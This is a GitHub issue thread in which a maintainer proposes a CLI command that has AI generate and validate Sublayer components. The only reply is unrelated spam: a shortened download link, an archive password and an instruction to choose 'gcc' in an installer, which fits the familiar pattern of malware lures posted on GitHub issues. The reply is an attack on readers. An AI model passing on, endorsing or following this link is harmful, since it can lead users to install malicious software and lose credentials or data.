### ISSUE TITLE
Create Sublayer::Generator creator and validator CLI command

### ISSUE THREAD

**Issue by swerner** [sublayerapp/sublayer#89]
Using a more specific version of something like this: https://github.com/sublayerapp/sublayer/blob/main/spec/generators/examples/code_from_blueprint_generator.rb we can have AI generate any Sublayer components, name them, and place them in the relevant place in the user's project.

We should also be able to validate the interface and re-generate if there are any issues

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
